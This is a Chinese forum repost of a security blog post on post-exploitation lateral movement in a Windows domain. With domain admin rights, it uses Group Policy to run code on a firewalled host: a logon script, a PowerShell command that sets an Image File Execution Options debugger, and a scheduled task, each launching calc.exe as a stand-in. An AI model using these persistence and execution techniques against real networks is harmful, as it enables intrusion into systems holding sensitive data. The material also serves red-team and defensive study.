原文链接:http://ringk3y.com/2018/05/21/%E ... %E6%9D%83%E9%99%90/
情景如下 在域中获取到了域管理员权限,其中一台机器上面存放绝密资料,但是该机器的防火墙是打开的,所有入站请求都被拦截,也就是说不能进行远程桌面连接、远程过程调用(RPC)等方式执行命令。
思路1- 启动脚本 在域控制器上配置组策略,用户下次登录时运行我们指定好的脚本 服务器管理器->功能->组策略管理->林: z3r0.com -> Default Domain Policy
右键点击编辑 用户配置->windows 设置 -> 登录 双击登录 将脚本放到USER\Scripts\Logon目录下
这里的exploit.bat 只是弹出一个计算器
添加好后,坐等下次用户登录时触发 效果图
思路二、通过远程修改注册表方式 通过修改GptTmpl.inf文件,每隔两小时请求更新组策略的时候在域控制器上构造好GptTmpl.inf文件,在注册表中添加一个debug调试器,执行命令 详细参考 https://www.anquanke.com/post/id/85074具体利用方法如下 在域控制器上执行 powershellImport-Module GroupPolicySet-GPRegistryValue -Name "Default Domain Policy" -ValueName "debugger" -Value "\\z3r0.com\SYSVOL\calc.exe" -Type String -Key "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe"当用户运行资源管理器时会执行放在域控制器共享中的calc.exe
思路三、计划任务 前两种有一个缺陷就是需要用户交互,万一这台机器一直没有人上去操作岂不是一直获取不了权限? 不存在的,通过域组策略给它添加一个计划任务。
在域控制器上打开组策略编辑器 用户配置->首选项->控制面板设置->计划任务 新建->计划任务
等两小时域用户更新策略时,计划任务就会刷新出来 可以看到刷新策略后计划任务添加上来了
| 
|小黑屋|手机版|中国白客联盟-BUC
( 赣ICP备15007148号-6 ) 
窥视卡
雷达卡
发表于 2018-7-5 12:21:12
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
显身卡
发表于 2018-7-6 10:03:32